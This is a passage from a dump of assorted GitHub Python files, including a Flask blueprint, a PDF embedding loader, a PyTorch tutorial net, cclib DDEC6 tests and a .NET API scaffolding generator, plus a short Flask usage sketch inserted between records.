mon_depickler.load()\n\n\t\tprint(\"Loaded from the log file: {}\".format(data))\n\n\t\tself.ListLog = data\n\n\tdef SetLog(self, log):\n\n\t\twith open('log', 'wb') as Fichier:\n\t\t\tmon_pickle = pickle.Pickler(Fichier)\n\t\t\tmon_pickle.dump(log)\n\n\nif __name__ == '__main__':\n\n\tmain = WakeOnLanGraphical()\n","repo_name":"scorpix06/simple-python-wake-on-lan","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"112523905","text":"from flask import Blueprint, render_template, redirect, url_for, session\n\n# homepage blueprint definition\nHomepage = Blueprint(\n    \"Homepage\",\n    __name__,\n    static_folder=\"static\",\n    static_url_path=\"/\",\n    template_folder=\"templates\",\n)\n\n\n# Routes\n@Homepage.route(\"/\")\ndef index():\n    try:\n        user = session[\"user\"]\n    except KeyError:\n        user = \"\"\n    return render_template(\"homepage.html\", user=user)\n","repo_name":"noam-raanan-bgu/team9","sub_path":"pages/homepage/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
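A short sketch of how the Homepage blueprint above could be wired into an application. The import path is taken from the record's sub_path and the rest is a hypothetical app entry point; a secret_key is set because the view reads session["user"].

from flask import Flask

from pages.homepage.homepage import Homepage  # assumed importable per the record's sub_path

app = Flask(__name__)
app.secret_key = "change-me"  # required for the session["user"] lookup in the view
app.register_blueprint(Homepage)

if __name__ == "__main__":
    app.run(debug=True)

+{"seq_id":"72596893926","text":"from langchain.document_loaders import PyPDFLoader\nimport os\nfrom haystack.document_stores import FAISSDocumentStore\nfrom haystack.nodes import EmbeddingRetriever\nfrom tqdm import tqdm\nimport re\nfrom langchain.text_splitter import CharacterTextSplitter\nimport pdfplumber\n\nimport PyPDF4\nimport fitz\nfrom haystack import Document\n\n\ndef getAllFileNames(directory):\n\n    return os.listdir(directory)\n\ndef init_store():\n\n    try:\n        sp_store = FAISSDocumentStore.load(index_path=\"./sharepoint/sp_faiss_index.faiss\")\n        sp_loaded = True\n    except:\n        sp_store = FAISSDocumentStore(\n            sql_url=\"sqlite:///sharepoint/sp_document_store.db\",\n            similarity=\"cosine\",\n            embedding_dim=768,\n            duplicate_documents='overwrite'\n        )\n        sp_loaded = False\n\n    return sp_store, sp_loaded\n\ndef 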
parseFilesAndEmbedDocuments(directory, filenames, sp_document_store, sp_retriever):\n\n    docs = []\n    doc_num = 0\n    for filename in tqdm(filenames, desc=\"Processing PDF Files: \"):\n        path = fr\"{directory}{filename}\"\n\n        type = path.split(\".\")[-1]\n        print(\"==================\\n\",filename)\n\n        # We are only processing PDF files\n        if type == \"pdf\":\n            all_text = test_splitter(path)\n            if all_text is None:\n                continue\n\n            for text in all_text:\n\n                if len(text) == 1:\n                    header = \"\"\n                    doc_content = text[0]\n                else:\n                    header = text[0]\n                    doc_content = text[0].strip() + \" - \" + text[1]\n\n                if doc_content.strip() == \"\" or len(re.findall(\"[/,:]\", doc_content)) > 30 or len(doc_content) < 50:\n                    continue\n\n                doc = Document(\n                    content= doc_content,\n                    id= doc_num,\n                    meta = {\n                        \"filename\" : filename,\n                        \"header\" : header\n                    }\n                )\n                print(\"Doc: \" + doc.content)\n                docs.append(doc)\n                doc_num +=1\n        print(\"=================\")\n\n    print(\"sharepoint documents to add to DB:\", len(docs))\n\n    sp_document_store.write_documents(docs)\n    sp_document_store.update_embeddings(sp_retriever)\n\n    print(\"sharepoint docs added:\", sp_document_store.get_document_count())\n    print(\"sharepoint docs embedded:\", sp_document_store.get_embedding_count())\n\n    sp_document_store.save(index_path=\"./sharepoint/sp_faiss_index.faiss\")\n\n\ndef test_splitter(file_path):\n\n    try:\n        with pdfplumber.open(file_path) as pdf:\n\n            all_text = []\n\n            for page in pdf.pages:\n\n                text_type = []\n\n                bold_str = \"\"\n                norm_str = \"\"\n\n                isBolded = False\n\n                try:\n                    page.objects['char']\n                except:\n                    continue\n                for char in page.objects['char']:\n\n                    if char[\"object_type\"] == \"char\" and \"Bold\" in char[\"fontname\"]:\n                        if (not isBolded):\n                            text_type.append(norm_str)\n                            norm_str = \"\"\n                            all_text.append(text_type)\n                            text_type = []\n                            isBolded = True\n                        bold_str += char['text']\n\n                    elif char[\"object_type\"] == \"char\" and \"Bold\" not in char[\"fontname\"]:\n                        if (isBolded):\n                            text_type.append(bold_str)\n                            bold_str = \"\"\n                            isBolded = False\n                        norm_str += char['text']\n\n                text_type.append(norm_str)\n                all_text.append(text_type)\n\n            return all_text\n\n    except:\n\n        return None\n\ndef main():\n\n    test_splitter(r\"/Users/dhoule5/OneDrive - UHG/EIS Artifacts/UnitedHealth Group - File Transfer - Electronic Communication Gateway (ECG).pdf\")\n\n    # directory = r\"/Users/dhoule5/OneDrive - UHG/EIS Artifacts/\"\n    # filenames = getAllFileNames(directory)\n    # parseFilesAndEmbedDocuments(directory, filenames, sp_document_store, sp_retriever)\n\nif __name__ == \"__main__\": \n    main()\n","repo_name":"b-castellano/RFP-Retriever","sub_path":"sharepoint/sp_load.py","file_name":"sp_load.py","file_ext":"py","file_size_in_byte":6132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"72253693604","text":"#!/usr/bin/env python\n# coding=utf-8\n# pylint: skip-file\n# pylint: disable-all\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nclass Net(nn.Module):\n    def __init__(self):\n        super(Net, self).__init__()\n        self.conv1 = nn.Conv2d(1, 6, 3)\n        self.conv2 = nn.Conv2d(6, 16, 3)\n        self.fc1 = nn.Linear(16*6*6, 120)\n        self.fc2 = nn.Linear(120, 84)\n        self.fc3 = nn.Linear(84, 10)\n\n    def forward(self, x):\n        x = F.max_pool2d(F.relu(self.conv1(x)), (2,2))\n        x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n        x = x.view(-1, self.num_flat_features(x))\n        x = F.relu(self.fc1(x))\n        x = F.relu(self.fc2(x))\n        x = self.fc3(x)\n        return x\n\n    def num_flat_features(self, x):\n        size = x.size()[1:]\n        num_features = 1\n        for s in size:\n            num_features *= s\n        return num_features\n\nnet = Net()\nprint(net)\n\nparam = list(net.parameters())\nprint(len(param))\nprint(param[0].size())\n\ndata = torch.randn(1,1,32,32)\nout = net(data)\nprint(out)\n\nnet.zero_grad()\nout.backward(torch.randn(1,10))\n\nout = net(data)\ntarget = torch.randn(10)\ntarget = target.view(1,-1)\ncriterion = nn.MSELoss()\nloss = criterion(out, target)\nprint(loss)\n\nprint(loss.grad_fn)\n\nnet.zero_grad()\nprint('conv1.bias.grad before backward')\nprint(net.conv1.bias.grad)\nprint('conv1.bias.data before backward')\nprint(net.conv1.bias.data)\n\noptimizer = optim.SGD(net.parameters(), lr=0.01)\n\noptimizer.zero_grad()\nout = net(data)\nloss = criterion(out, target)\nloss.backward()\noptimizer.step()\n\nprint('conv1.bias.grad after backward')\nprint(net.conv1.bias.grad)\nprint('conv1.bias.data after backward')\nprint(net.conv1.bias.data)\n\n","repo_name":"thucgn/pytorch","sub_path":"test/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"27686336798","text":"from typing import List\n\nclass Solution:\n    def maxCoins(self, piles: List[int]) -> int:\n        piles.sort()\n        ans = 0\n        i = len(piles)-2\n        j = -1\n        while(i>j):\n            ans+=piles[i]\n            j+=1\n            i-=2\n        return ans\n","repo_name":"NatinaelFekadu/competitive-programing","sub_path":"Maximum Number of Coins You Can Get.py","file_name":"Maximum Number of Coins You Can Get.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"27799766031","text":"#!/usr/bin/python3\nimport requests\nimport json\n# define URL\nGETURL = \"http://validate.jsontest.com/\"\ndef main():\n    # test data to validate as legal json\n    mydata = {\"fruit\":[\"apple\",\"pear\"],\"veg\":[\"carrot\"]}\n    ## use the json library to convert to legal json, then strip out whitespace\n    jsonToValidate = f\"json={json.dumps(mydata).replace(' ', '')}\"\n    # use the requests library to send an HTTP GET\n    resp = requests.get(f\"{GETURL}?{jsonToValidate}\")\n    # strip off the JSON response\n    # and convert to a Pythonic list / dict\n    respjson = resp.json()\n    # display our Pythonic data (list / dict)\n    print(respjson)\n    # just display the value of \"validate\"\n    print(f\"Is your json valid? {respjson['validate']}\")\nif __name__ == \"__main__\":\n    main()\n","repo_name":"tapantriv/lastday","sub_path":"pyapi/jsontest/jsontestValidateGET.py","file_name":"jsontestValidateGET.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"42901046734","text":"#!/usr/bin/env python\n\nfrom markupsafe import Markup\nfrom openpyxl.reader.excel import load_workbook\n\nclass CopyException(Exception):\n    pass\n\nclass Error(object):\n    \"\"\"\n    An error object that can mimic the structure of the COPY data, whether the error happens at the Copy, Sheet or Row level. Will print the error whenever it gets repr'ed. \n    \"\"\"\n    _error = ''\n\n    def __init__(self, error):\n        self._error = error\n\n    def __getitem__(self, i):\n        return self\n\n    def __iter__(self):\n        return iter([self])\n\n    def __len__(self):\n        return 1\n\n    def __repr__(self):\n        return self._error\n\n    def __nonzero__(self):\n        return False\n\nclass Row(object):\n    \"\"\"\n    Wraps a row of copy for error handling.\n    \"\"\"\n    _sheet = None\n    _row = []\n    _columns = []\n    _index = 0\n\n    def __init__(self, sheet, row, columns, index):\n        self._sheet = sheet\n        self._row = row\n        self._columns = columns\n        self._index = index\n\n    def __getitem__(self, i):\n        \"\"\"\n        Allow dict-style item access by index (column id), or by column name.\n        \"\"\"\n        if isinstance(i, int):\n            if i >= len(self._row):\n                return Error('COPY.%s.%i.%i [column index outside range]' % (self._sheet.name, self._index, i))\n\n            value = self._row[i]\n\n            return Markup(value or '')\n\n        if i not in self._columns:\n            return Error('COPY.%s.%i.%s [column does not exist in sheet]' % (self._sheet.name, self._index, i))\n\n        value = self._row[self._columns.index(i)]\n\n        return Markup(value or '')\n\n    def __iter__(self):\n        return iter(self._row)\n\n    def __len__(self):\n        return len(self._row)\n\n    def __unicode__(self):\n        if 'value' in self._columns:\n            value = self._row[self._columns.index('value')]\n\n            return Markup(value or '')\n\n        return Error('COPY.%s.%s [no value column in sheet]' % (self._sheet.name, self._row[self._columns.index('key')]))\n\n    def __html__(self):\n        return self.__unicode__()\n\n    def __nonzero__(self):\n        if 'value' in self._columns:\n            val = self._row[self._columns.index('value')]\n\n            if not val:\n                return False\n\n            return len(val)\n\n        return True\n\nclass Sheet(object):\n    \"\"\"\n    Wrap copy text, for a single worksheet, for error handling.\n    \"\"\"\n    name = None\n    _sheet = []\n    _columns = []\n\n    def __init__(self, name, data, columns):\n        self.name = name\n        self._sheet = [Row(self, [row[c] for c in columns], columns, i) for i, row in enumerate(data)]\n        self._columns = columns\n\n    def __getitem__(self, i):\n        \"\"\"\n        Allow dict-style item access by index (row id), or by row name (\"key\" column).\n        \"\"\"\n        if isinstance(i, int):\n            if i >= len(self._sheet):\n                return Error('COPY.%s.%i [row index outside range]' % (self.name, i))\n\n            return self._sheet[i]\n\n        if 'key' not in self._columns:\n            return Error('COPY.%s.%s [no key column in sheet]' % (self.name, i))\n\n        for row in self._sheet:\n            if row['key'] == i:\n                return row\n\n        return Error('COPY.%s.%s [key does not exist in sheet]' % (self.name, i))\n\n    def __iter__(self):\n        return iter(self._sheet)\n\n    def __len__(self):\n        return len(self._sheet)\n\nclass Copy(object):\n    \"\"\"\n    
Wraps copy text, for multiple worksheets, for error handling.\n \"\"\"\n _filename = ''\n _copy = {}\n\n def __init__(self, filename):\n self._filename = filename\n self.load()\n\n def __getitem__(self, name):\n \"\"\"\n Allow dict-style item access by sheet name.\n \"\"\"\n if name not in self._copy:\n return Error('COPY.%s [sheet does not exist]' % name)\n\n return self._copy[name]\n\n def load(self):\n \"\"\"\n Parses the downloaded Excel file and writes it as JSON.\n \"\"\"\n try:\n book = load_workbook(self._filename, data_only=True)\n except IOError:\n raise CopyException('\"%s\" does not exist. Have you run \"fab update_copy\"?' % self._filename)\n\n for sheet in book:\n columns = []\n rows = []\n\n for i, row in enumerate(sheet.rows):\n row_data = [c.internal_value for c in row]\n\n if i == 0:\n columns = row_data \n continue\n\n # If nothing in a row then it doesn't matter\n if all([c is None for c in row_data]):\n continue\n\n rows.append(dict(zip(columns, row_data)))\n\n self._copy[sheet.title] = Sheet(sheet.title, rows, columns)\n\n def json(self):\n \"\"\"\n Serialize the copy as JSON.\n \"\"\"\n import json\n\n obj = {} \n \n for name, sheet in self._copy.items():\n if 'key' in sheet._columns:\n obj[name] = {}\n\n for row in sheet:\n obj[name][row['key']] = row['value']\n else:\n obj[name] = []\n \n for row in sheet:\n obj[name].append(row._row)\n \n return json.dumps(obj)\n","repo_name":"gabelula/zapatistas","sub_path":"marcos/lib/python2.7/site-packages/copytext.py","file_name":"copytext.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42148572859","text":"from collections import Counter\n\nN = int(input())\nA_list = list(map(int, input().split()))\nB_list = list(map(int, input().split()))\nC_list = list(map(int, input().split()))\n\noutput = 0\nB_C_list = []\nfor i in range(N):\n B_C_list.append(B_list[C_list[i] - 1])\n\nB_C_list_counter = Counter(B_C_list)\nfor num in A_list:\n output += B_C_list_counter[num]\n\nprint(output)\n\n\"\"\"\ntime : 10m\ntime complexity : O(N)\nspace complexity : O(N)\n\"\"\"","repo_name":"kobakobashu/atcoder","sub_path":"ABC202/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72785618404","text":"import os\nimport sys\nimport unittest\nimport pytest\nfrom typing import Optional\n\nimport numpy\n\nfrom cclib.method import DDEC6, volume\nfrom cclib.parser import Psi4\nfrom cclib.io import ccread\nfrom cclib.method.calculationmethod import MissingAttributeError\n\nfrom numpy.testing import assert_allclose\n\nfrom ..test_data import getdatafile\n\nclass DDEC6Test(unittest.TestCase):\n \"\"\"DDEC6 method tests.\"\"\"\n\n def setUp(self) -> None:\n super(DDEC6Test, self).setUp()\n self.parse()\n\n def parse(self, molecule_name: Optional[str] = None) -> None:\n if molecule_name is None:\n self.data, self.logfile = getdatafile(Psi4, \"basicPsi4-1.2.1\", [\"water_mp2.out\"])\n else:\n self.data = ccread(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), f\"{molecule_name}.out\")\n )\n\n def testmissingrequiredattributes(self) -> None:\n \"\"\"Is an error raised when required attributes are missing?\"\"\"\n for missing_attribute in DDEC6.required_attrs:\n self.parse()\n vol = volume.Volume((-4, -4, -4), (4, 4, 4), (0.2, 0.2, 0.2))\n delattr(self.data, missing_attribute)\n with 
pytest.raises(MissingAttributeError):\n trial = DDEC6(self.data, vol, os.path.dirname(os.path.realpath(__file__)))\n\n def test_proatom_read(self) -> None:\n \"\"\"Are proatom densities imported correctly?\"\"\"\n\n self.parse()\n vol = volume.Volume((-4, -4, -4), (4, 4, 4), (0.2, 0.2, 0.2))\n\n self.analysis = DDEC6(self.data, vol, os.path.dirname(os.path.realpath(__file__)))\n\n refH_den = [\n 2.66407645e-01,\n 2.66407645e-01,\n 2.66407643e-01,\n 2.66407612e-01,\n 2.66407322e-01,\n ] # Hydrogen first five densities\n refH_r = [\n 1.17745807e-07,\n 4.05209491e-06,\n 3.21078677e-05,\n 1.39448474e-04,\n 4.35643929e-04,\n ] # Hydrogen first five radii\n refO_den = [\n 2.98258510e02,\n 2.98258510e02,\n 2.98258509e02,\n 2.98258487e02,\n 2.98258290e02,\n ] # Oxygen first five densities\n refO_r = [\n 5.70916728e-09,\n 1.97130512e-07,\n 1.56506399e-06,\n 6.80667366e-06,\n 2.12872046e-05,\n ] # Oxygen first five radii\n\n assert_allclose(self.analysis.proatom_density[0][0:5], refO_den, rtol=1e-3)\n assert_allclose(self.analysis.proatom_density[1][0:5], refH_den, rtol=1e-3)\n assert_allclose(self.analysis.proatom_density[2][0:5], refH_den, rtol=1e-3)\n\n def test_water_charges(self) -> None:\n \"\"\"Are charges and quantities in each step of DDEC6 algorithm calculated correctly\n for water?\n \n Here, values are compared against `chargemol` calculations.\n Due to the differences in basis set used for calculation and slightly different integration\n grid, some discrepancy is inevitable in the comparison.\n \"\"\"\n\n self.parse()\n # use precalculated fine cube file\n imported_vol = volume.read_from_cube(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), \"water_fine.cube\")\n )\n\n analysis = DDEC6(self.data, imported_vol, os.path.dirname(os.path.realpath(__file__)))\n analysis.calculate()\n\n radial_indices = []\n for atomi in range(len(self.data.atomnos)):\n lst = []\n for radius in [0.05, 0.10, 0.15, 0.20, 0.25]:\n # find closest radius index\n lst.append(numpy.abs(analysis.radial_grid_r[atomi] - radius).argmin())\n radial_indices.append(lst)\n\n # values from `chargemol` calculation\n # which is based on proatomic densities calculated with different basis set.\n # discrepancy comes from the fact that `chargemol` grid & `horton` grid don't exactly match\n # (rtol is adjusted to account for this inevitable discrepancy)\n # STEP 1\n # Check assigned charges.\n assert_allclose(analysis.reference_charges[0], [-0.513006, 0.256231, 0.256775], rtol=0.10)\n # STEP 2\n # Check assigned charges.\n assert_allclose(analysis.reference_charges[1], [-0.831591, 0.415430, 0.416161], rtol=0.20)\n # STEP 3\n # Check integrated charge density (rho^cond(r)) on grid with integrated values (=nelec).\n assert abs(analysis.charge_density.integrate()-analysis.rho_cond.integrate()) < 1\n for atomi in range(len(analysis.data.atomnos)):\n assert abs(analysis._integrate_from_radial([analysis._cond_density[atomi]], [atomi])\n + analysis.reference_charges[-1][atomi]-analysis.data.atomnos[atomi]) < \\\n 0.5\n # Also compare with data from `chargemol`\n # discrepancy comes from the fact that `chargemol` grid and `horton` grid do not exactly match\n assert_allclose(\n analysis.tau[0][radial_indices[0]],\n [0.999846160, 0.999739647, 0.999114037, 0.997077942, 0.994510889],\n rtol=0.10,\n )\n assert_allclose(\n analysis.tau[1][radial_indices[1]],\n [0.864765882, 0.848824620, 0.805562019, 0.760402501, 0.736949861],\n rtol=0.10,\n )\n assert_allclose(\n analysis.tau[2][radial_indices[2]],\n [0.845934391, 0.839099407, 
0.803699493, 0.778428137, 0.698628724],\n            rtol=0.10,\n        )\n        # STEP 4-7\n        # Check values assigned to u_A\n        assert_allclose(\n            analysis.u_A,\n            [\n                [0.572349429, 0.296923935, 0.296520531],\n                [0.563154399, 0.291919678, 0.291376710],\n                [0.563475132, 0.292007655, 0.291508794],\n                [0.565816045, 0.293131322, 0.292902112],\n            ],\n            atol=0.05,\n        )\n        # Check assigned charges\n        assert_allclose(analysis.fragcharges, [-0.757097, 0.378410, 0.378687], atol=0.2)\n\n    @pytest.mark.skipif(sys.version_info > (3, 8), reason=\"This test doesn't converge with newer psi4 versions available with python >3.8\")\n    def test_chgsum_h2(self) -> None:\n        \"\"\" Are DDEC6 charges for hydrogen atoms in nonpolar H2 small as expected?\n        \n        Using a much denser grid (spacing of 0.1 rather than 0.2, which is the cube file included\n        in the test) gives [0.00046066, 0.00046066]. \n        \"\"\"\n\n        self.parse(\"h2\")\n        vol = volume.Volume((-2, -2, -2), (2, 2, 2), (0.2, 0.2, 0.2))\n        analysis = DDEC6(self.data, vol, os.path.dirname(os.path.realpath(__file__)))\n        analysis.calculate()\n\n        assert abs(analysis.fragcharges[0]-analysis.fragcharges[1]) < 1e-12\n\n    def test_chgsum_co(self) -> None:\n        \"\"\" Are DDEC6 charges for carbon monoxide reported as expected?\n        \n        Deviation from a total of zero (-0.00682) occurs because the integrated value of total\n        density (14.006876594937234) is slightly larger than the number of electrons.\n        \n        Using a finer grid reduces this discrepancy.\n        \"\"\"\n\n        self.parse(\"co\")\n        imported_vol = volume.read_from_cube(\n            os.path.join(os.path.dirname(os.path.realpath(__file__)), \"co.cube\")\n        )\n        analysis = DDEC6(self.data, imported_vol, os.path.dirname(os.path.realpath(__file__)))\n        analysis.calculate()\n\n        assert abs(numpy.sum(analysis.fragcharges)-0) < 1e-2\n        assert_allclose(analysis.fragcharges, [0.13221636, -0.13903595], atol=1e-3)\n\n    def test_chg_nh3(self) -> None:\n        \"\"\" Are DDEC6 charges for ammonia reported as expected?\n        \n        Deviation from a total of zero (0.026545) occurs because the integrated value of total\n        density (9.973453129261163) is slightly smaller than the number of electrons.\n        \n        Using a finer grid reduces this discrepancy.\n        \"\"\"\n\n        self.parse(\"nh3\")\n        imported_vol = volume.read_from_cube(\n            os.path.join(os.path.dirname(os.path.realpath(__file__)), \"nh3.cube\")\n        )\n        analysis = DDEC6(self.data, imported_vol, os.path.dirname(os.path.realpath(__file__)))\n        analysis.calculate()\n\n        assert_allclose(\n            analysis.fragcharges, [-0.7824003, 0.26854388, 0.26959206, 0.27081123], atol=1e-3\n        )\n","repo_name":"cclib/cclib","sub_path":"test/method/testddec.py","file_name":"testddec.py","file_ext":"py","file_size_in_byte":8363,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"52"}
+{"seq_id":"29592199020","text":"import main\nfrom math import isclose\ndef test_duration():\n    fnin = 'video.mp4'\n    fnout1 = 'video_480p.mp4'\n    fnout2 = 'video_720p.mp4'\n\n    orig_meta = main.ffprobe(fnin)\n    orig_duration = float(orig_meta['streams'][0]['duration'])\n    test = main.MyProcess()\n    test.convert()\n    meta_480 = main.ffprobe(fnout1)\n    meta_720 = main.ffprobe(fnout2)\n    duration_480 = float(meta_480['streams'][0]['duration'])\n    duration_720 = float(meta_720['streams'][0]['duration'])\n    assert isclose(orig_duration, duration_480, abs_tol=1)\n    assert isclose(orig_duration, duration_720, abs_tol=1)\n    print('all successful!')\n\ntest_duration()\n","repo_name":"ec500-software-engineering/exercise-2-ffmpeg-zywan","sub_path":"test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
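The test above relies on a main module (not shown in this record) exposing ffprobe() and MyProcess; a minimal sketch of such an ffprobe wrapper, assuming the ffprobe CLI is on PATH, could look like this — the flags used are the standard ffprobe JSON-output options, and they produce the streams[0].duration field the test reads.

import json
import subprocess

def ffprobe(filename):
    # -print_format json with -show_streams yields streams[0].duration as used by test_duration().
    out = subprocess.check_output([
        "ffprobe", "-v", "quiet", "-print_format", "json",
        "-show_format", "-show_streams", filename,
    ])
    return json.loads(out)

+{"seq_id":"29655540363","text":"from microboiler.modules.basemodule import BaseModule\nfrom microboiler.modules.devops.docker import Docker\nfrom microboiler.modules.databases.redis import BuildRedisConnectionString\nfrom microboiler.modules.utils.utils import (InDbQ,to_camelcase,\n    FindClientWithName,\n    FindDatabaseWithName,\n    FindEventBusWithName,\n    FindIdentityServiceWithName,\n    FindServerWithName,\n    FindAllFilesWithExtensionInDirectory)\n\nfrom microboiler.modules.templating.templating import (replace_template_file,\n    filter_region,\n    filter_region_with_tag,\n    filter_sub_region,\n    clear_file_region_tags,\n    ClearRegionLines,\n    Clear_File_Region_Marks)\n\nfrom microboiler.modules.databases.postgre import BuildPostgreConnectionString\nfrom microboiler.modules.databases.mysql import BuildMysqlConnectionString\n\nfrom microboiler.modules.templating.csharp import Csharp\n\nimport os\nimport shutil\n\n\nclass DotnetApi(BaseModule):\n    def __init__(self, projectOptions, project_templates_paths, outputPath):\n        self.csharp_templater = Csharp(projectOptions,project_templates_paths,outputPath)\n        super().__init__(projectOptions, project_templates_paths, outputPath)\n\n    def HandleDotnetApiService(self, api_service_options):\n        CamelCaseName = to_camelcase(api_service_options['name'])\n        apiServicesPath = os.path.join(self.project_templates_paths,'api_services')\n        api_template_folder = os.path.join(apiServicesPath,'dotnet_web_api','src')\n        srcDir = os.path.join(self.outputPath,'src')\n        api_copy_folder = os.path.join(srcDir,'ApiServices',CamelCaseName)\n        if os.path.isdir(api_copy_folder):\n            shutil.rmtree(api_copy_folder,ignore_errors=True)\n        # TODO: Swap shutil operations\n        #shutil.copytree(api_template_folder,api_copy_folder,ignore=shutil.ignore_patterns('bin*','obj*'))\n        shutil.copytree(api_template_folder,api_copy_folder)\n        api_src_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'DotnetWebApi')\n        api_src_rename_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'src')\n        api_csproj_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'src','DotnetWebApi.csproj')\n        api_csproj_rename_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'src',CamelCaseName+'.csproj')\n\n        if not os.path.isdir(api_src_rename_folder):\n            shutil.copytree(api_src_folder,api_src_rename_folder)\n            shutil.rmtree(api_src_folder,ignore_errors=True)\n        else: \n            shutil.rmtree(api_src_rename_folder,ignore_errors=True)\n            shutil.copytree(api_src_folder,api_src_rename_folder)\n\n        if not os.path.exists(api_csproj_rename_folder):\n            shutil.copy(api_csproj_folder,api_csproj_rename_folder)\n            os.remove(api_csproj_folder)\n        else: \n            os.remove(api_csproj_rename_folder)\n            shutil.copy(api_csproj_folder,api_csproj_rename_folder)\n\n\n        self.HandleDotnetApiCsproj(api_service_options,api_copy_folder)\n        self.HandleDotnetApiStartup(api_service_options,api_copy_folder)\n        self.HandleDotnetApiProgramFile(api_service_options,api_copy_folder)\n        self.HandleDotnetApiDbContext(api_service_options,api_copy_folder)\n        self.HandleDotnetApiNameSpaceAndCleaning(api_service_options,api_copy_folder)\n        self.HandleDotnetApiDockerFile(api_service_options,api_copy_folder)\n\n        docker_config = 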
self.HandleDotnetApiDockerCompose(api_service_options,api_copy_folder)\n docker_instance = Docker.getInstance()\n docker_instance.AddService(api_service_options['name'], docker_config)\n\n def HandleDotnetApiCsproj(self, dotnet_service, api_copy_folder):\n print ('Handle DotnetApi Csproj File')\n api_csproj_path = os.path.join(api_copy_folder,\n 'src',\n to_camelcase(dotnet_service['name'])+'.csproj')\n # Handle Host Application\n self.csharp_templater.HandleCsprojLogging(dotnet_service,api_csproj_path)\n self.csharp_templater.HandleCsprojDatabase(dotnet_service,api_csproj_path)\n self.csharp_templater.HandleCsprojEventbus(dotnet_service,api_csproj_path)\n def BuildConnStringForDotnetApi(self, dotnet_options):\n database_instance_name = dotnet_options['database']['provider']\n database_instance = FindDatabaseWithName(self.projectOptions, database_instance_name)\n database_type = database_instance['type']\n connection_string ='' \n user = 'doom'\n password = 'machine'\n if database_type=='mysql' or database_type=='postgresql':\n if 'username' in database_instance:\n user = database_instance['username']\n if 'password' in database_instance:\n password = database_instance['password']\n if database_type == 'mysql': \n connection_string, connection_string_dev = BuildMysqlConnectionString(database_instance['name'],dotnet_options['name'],user,password) \n elif database_type == 'postgresql':\n connection_string, connection_string_dev = BuildPostgreConnectionString(database_instance['name'],dotnet_options['name'],user,password) \n \n return connection_string , connection_string_dev\n\n def HandleDotnetApiStartup(self, dotnet_service, api_copy_folder):\n print ('Handle DotnetApi Startup.cs File')\n api_startup_path = os.path.join(api_copy_folder,\n 'src',\n 'Startup.cs')\n \n self.csharp_templater.HandleCSharpDatabase(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpCache(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpEventbus(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpLogging(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpServer(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpSwagger(dotnet_service,api_startup_path)\n # Set DBContext Name\n CamelCaseName = to_camelcase(dotnet_service['name'])\n replaceDict = {\n 'NameContext': CamelCaseName.replace('.','') + 'Context' \n }\n if 'database' in dotnet_service:\n \n conn_string, conn_string_dev = self.BuildConnStringForDotnetApi(dotnet_service)\n replaceDict['{{database:connectionString}}'] = conn_string\n replaceDict['{{database:connectionString-dev}}'] = conn_string_dev\n\n if 'cache' in dotnet_service:\n if dotnet_service['cache']['type'] == 'redis':\n redis_instance = FindDatabaseWithName(self.projectOptions, dotnet_service['cache']['redis_options']['redis_server'])\n if redis_instance is None:\n print ('Warning: Redis instance could not be found. 
Configuration left default')\n else:\n redis_conn_string, redis_conn_string_dev = BuildRedisConnectionString(redis_instance)\n replaceDict['{{redis_options:connection}}'] = redis_conn_string\n replaceDict['{{redis_options:connection-dev}}'] = redis_conn_string_dev\n if 'redis_instance_name' in dotnet_service['cache']['redis_options']:\n replaceDict['{{redis_options:instance_name}}'] = dotnet_service['cache']['redis_options']['redis_instance_name']\n if 'authorization' in dotnet_service:\n issuer = dotnet_service['authorization']['issuer']\n if issuer is None:\n print ('Error: Identity Issuer for '+dotnet_service['name']+' is required')\n identity_instance = FindIdentityServiceWithName(self.projectOptions, issuer)\n if identity_instance is None:\n print ('Error: Identity Service Instance for '+dotnet_service['name']+' could not be found')\n else:\n replaceDict['{{authorization:api_name}}'] = dotnet_service['name'] \n replaceDict['{{authorization:authority}}'] = str.lower(identity_instance['name'])+'.localhost'\n replaceDict['{{authorization:authority-dev}}'] = 'http://localhost:'+str(identity_instance['port'])\n if 'api_secret' in dotnet_service['authorization']:\n replaceDict['{{authorization:api_secret}}'] = dotnet_service['authorization']['secrets'][0]\n else:\n # Set Default Secret\n replaceDict['{{authorization:api_secret}}'] = 'secret'\n\n replace_template_file(api_startup_path,replaceDict)\n\n def HandleDotnetApiProgramFile(self, dotnet_service, api_copy_folder):\n api_program_path = os.path.join(api_copy_folder,\n 